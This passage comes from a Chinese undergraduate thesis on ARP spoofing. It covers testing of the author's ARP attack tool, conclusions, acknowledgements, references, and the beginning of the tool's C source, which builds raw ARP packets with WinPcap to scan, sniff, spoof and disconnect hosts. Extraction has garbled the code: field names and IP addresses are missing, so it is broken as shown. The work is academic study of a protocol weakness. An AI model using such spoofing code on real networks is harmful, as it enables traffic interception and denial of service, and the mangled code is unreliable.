【正文】 else{ memcpy(,mmac,6)。 memcpy(,mmac,6)。 } memset(sendbuf,0,sizeof(sendbuf))。 memcpy(sendbuf,amp。eth,sizeof(eth))。 memcpy(sendbuf+sizeof(eth),amp。arp,sizeof(arp))。 PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp))。 Sleep(1000)。 程序的測試下面我們通過截圖來測試下ARP攻擊工具。在這里聲明下一些IP地址， 為網(wǎng)關IP地址， 為筆者主機IP地址，以下類同。界面如下： 圖41 功能界面然后輸入你要選擇的功能進入相關功能。功能一：主機掃描：圖42 主機掃描功能三：ARP攻擊如下：圖43 ARP攻擊通過上面的幾個圖可以看出，本ARP攻擊工具可以良好的運行，并實現(xiàn)了相應的功能。5 小結在TCP/IP協(xié)議族中，ARP協(xié)議是一個基本的并且非常重要的協(xié)議。它的作用是將一臺計算機的IP地址翻譯成等價的硬件地址。ARP高速緩存是其運行的關鍵，我們可以用arp 命令來對高速緩存進行檢查和操作。由于當初ARP設計不足的原因，它的安全漏洞日益突出。ARP協(xié)議被設計成一種可信任的協(xié)議，缺乏合法性驗證手段，例如可以任意發(fā)送ARP應答包達到欺騙的目的，甚至可以將用戶的IP和MAC一起盜用，造成的后果非常嚴重。本文中的各種防御措施也存在各自的局限性，不可能對所有的攻擊都起到抑制的效果。如果多種方案配合使用，就可以最大限度的杜絕ARP攻擊的出現(xiàn)，保護好自己所在的網(wǎng)絡。 ARP攻擊的研究目前也非常多，例如AntiARP軟件，這個軟件的功能比較多，而且界面也比較友好。相比較本文的軟件功能相對少了一點，但是對其中比較重點的功能（諸如主機掃描、反嗅探掃描功能、ARP攻擊以及重置被攻擊主機）進行了編碼實現(xiàn)，通過自己的實踐對TCP/IP協(xié)議的理論知識有了更深入的了解，其中對以太網(wǎng)物理幀頭部、IP數(shù)據(jù)包頭部、ARP頭部的分析和填充并對返回包的分析讓我對網(wǎng)絡的底層實現(xiàn)有了深入的認識，在對本論文的研究過程中筆者不僅進行了更深入的學習，同時增加了自己對網(wǎng)絡研究的興趣，在以后的工作和學習中，可以進一步研究下，把這個小軟件做的更加的友好。 通過這段時間的學習與研究，不僅鞏固了我大學四年的專業(yè)知識，而且也鍛煉了我科技文章的寫作能力，使在網(wǎng)絡編程方面有了更進一步的提高與認識?，F(xiàn)在的網(wǎng)絡安全問題很嚴重，病毒泛濫，黑客攻擊、有害信息傳播層出不窮，這些問題技術復雜，原因眾多，有待我們進一步研究，來保護好這個已經(jīng)日益滲透到我們生活和工作中的網(wǎng)絡。致 謝大學四年轉瞬即逝，這是多么短暫的！但即將過去的四年對我而言，卻是人生中一個重要的轉折點，在成長的過程中，眾多的良師益友給予我生活和學習上的關懷和幫助，以及思想上的鞭策和鼓勵，使我終身受益。首先感謝論文的指導老師陸際光教授。本課題在選題及研究過程中得到陸老師的悉心指導，陸老師多次詢問研究進程，并為我指點迷津，幫助我開拓研究思路，給我的論文提了很多建設性的意見。陸老師一絲不茍的作風，嚴謹求實的態(tài)度，踏踏實實的精神，不僅授我以知識，而且教我如何做人做事的道理，雖歷時一載，卻給以終生受益無窮之道。感謝我的父親、母親，感謝他們二十多年對我的物質(zhì)和精神上的理解與支持。感謝雷建云老師、唐菀老師，洪雷老師、吳凡老師、楊宏振老師等對我四年來的精心培養(yǎng)和諄諄教誨，他們細心指導我的學習與研究，在此，我要向諸位老師深深地鞠上一躬。最后，感謝我的同學雷鳴、余輝、張曉偉等四年來對我學習、生活的關心和幫助。有了他們，我大學的生活充滿了精彩和快樂，他們是我一生難忘的朋友。特別是在程序調(diào)試階段，他們的計算機都成了我的ARP攻擊的對象，給我提供了很好的實驗環(huán)境，因此而造成他們的電腦上網(wǎng)掉線，IP沖突等問題，我深表歉意。在這四年的學習和生活中，老師的精心培養(yǎng)和諄諄教誨，使我充實了自己的科學知識和集體生活，這使將要走上社會的我有了一定的心理基礎和思想準備,大學生活即將結束，我將要離開培養(yǎng)我成長的母校，去開拓屬于自己的天地，這與眾多的老師的培養(yǎng)、同學的幫助、父母的關懷是不可分割的，我感謝幫助和關心過我的老師和同學以及我的父母，我感激你們，并深深的祝福你們！ 由于本人水平有限，時間緊迫，加上網(wǎng)絡技術發(fā)展日新月異，文章中難免有不妥之處，望見諒！參考文獻[1] Stevens. TCP/IP詳解?卷一：協(xié)議[M].范建華，胥光輝，：機械工業(yè)出版社，2002:4041[2] Stevens. TCP/IP詳解?卷三：TCP事務協(xié)議、HTTP、NNTP和UNIX域協(xié)議[M].胡谷雨，：機械工業(yè)出版社，2002[3] Wendell Odom. CCNA INTRO認證考試（640821）指南[M].：人民郵電出版社，2004[4] Wendell Odom. CCNA ICND認證考試（640811）指南[M]. ：人民郵電出版社，2004[5] （第4版）[M].北京：電子工業(yè)出版社，2004[6] [M].北京:電子工業(yè)出版社,2005[7] 張越．Visual C++網(wǎng)絡程序設計實例詳解[M]．北京：人民郵電出版社，2006[8] 王暉．精通Visual C++ [M]．北京：電子工業(yè)出版社，1999[9] [M].北京：清華大學出版社，2003[10] ++Builder高手[M].北京：清華大學出版社，2001[11] [M].北京：清華大學出版社，2005[12] 趙均,陳克非．ARP協(xié)議安全漏洞分析及其防御方法［J］．信息安全與通信保密．2006，（8）：7277[13] 羅杰云,倪德明．ARP協(xié)議的安全漏洞及其防范淺析［J］．系統(tǒng)安全．系統(tǒng)安全．2006，（5）：4345[14] 鄧清華,[J].微機發(fā)展,2004,(8):126128[15] [J].信息技術,2005,(5):4144[16] 徐功文,陳曙,[J].網(wǎng)絡與信息安全,2005,(1):46[17] [J].網(wǎng)絡安全,2005,(4):4042[18] 王佳,[J].微電子學與計算機,2004,21(4):1012[19] [20] 佚名. 詳談調(diào)用winpcap驅(qū)動寫arp多功能工具. evers/articles/,20020911[21] 佚名. 手把手教你玩轉ARP包. . 20040531[22] Sean Introduction To ARP Spoofing.,2001[23] DOUGLAS E with TCP/IP[M]. 北京:清華大學出版社,1998附錄：ARP攻擊程序源代碼include include include include include include cstdlibpragma ment(lib,ws2_32)pragma ment(lib,packet)define ETH_IP 0x0800define ETH_ARP 0x0806define ARP_REQUEST 0x0001define ARP_REPLY 0x0002define ARP_HARDWARE 0x0001define max_num_adapter 10pragma pack(push,1)typedef struct ethdr //以太網(wǎng)幀頭{ unsigned char eh_dst[6]。 unsigned char eh_src[6]。 unsigned short eh_type。}ETHDR,*PETHDR。typedef struct arphdr //ARP幀頭{ unsigned short arp_hdr。 unsigned short arp_pro。 unsigned char arp_hln。 unsigned char arp_pln。 unsigned short arp_opt。 unsigned char arp_sha[6]。 unsigned long arp_spa。 unsigned char arp_tha[6]。 unsigned long arp_tpa。}ARPHDR,*PARPHDR。typedef struct iphdr //IP幀頭{ unsigned char h_lenver。 unsigned char tos。 unsigned short total_len。 unsigned short ident。 unsigned short frag_and_flags。 unsigned char ttl。 unsigned char proto。 unsigned short checksum。 unsigned int sourceip。 unsigned int destip。}IPHDR,*PIPHDR。pragma pack(push)LPADAPTER lpadapter=0。LPPACKET lppacketr,lppackets。ULONG myip,firstip,secondip。UCHAR mmac[6]={0},fmac[6]={0},smac[6]={0}。BOOL mm=FALSE,fm=FALSE,sm=FALSE。 FILE *fp。 char adapterlist[max_num_adapter][1024]。char msg[50]。int num=0。void meun(){ printf(********************Welle to ARP tools******************** \n)。 printf(* Option: *\n)。 printf(* Get the mac address from firstip to secondip *\n)。 printf(* Get the sniffing host from firstip to secondip *\n)。 printf(* 1 Cheat the host between firstip and secondip *\n)。printf(* Sniff 2 Sniff if firstip == secondip == your own ip *\n)。 printf(* Shock 3 Shock if firstip == secondip != your own ip *\n)。 printf(* Reset the cheated host work normally *\n)。 printf(*Attention: **\n)。 printf(*1You must have installed the **\n)。printf(*2HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\IPEnableRouter==0x1\n)。printf(*******************Welle to ARP tools**********************\n)。 return 。}int getmine() //發(fā)送ARP Request數(shù)據(jù)報,請求獲得本地主機的MAC地址{ char sendbuf[1024]。 int k。 ETHDR eth。 ARPHDR arp。 for(k=0。k6。k++) { [k]=0xff。 [k]=0x82。 [k]=0x82。 [k]=0x00。 } =htons(ETH_ARP)。 =htons(ARP_HARDWARE)。 =htons(ETH_IP)。 =6。 =4。 =htons(ARP_REQUEST)。 =htonl(myip)。 =inet_addr()。 memset(sendbuf,0,sizeof(sendbuf))。 memcpy(sendbuf,amp。eth,sizeof(eth))。 memcpy(sendbuf+sizeof(eth),amp。arp,sizeof(arp))。 PacketInitPacket(lppackets,sendbuf,sizeo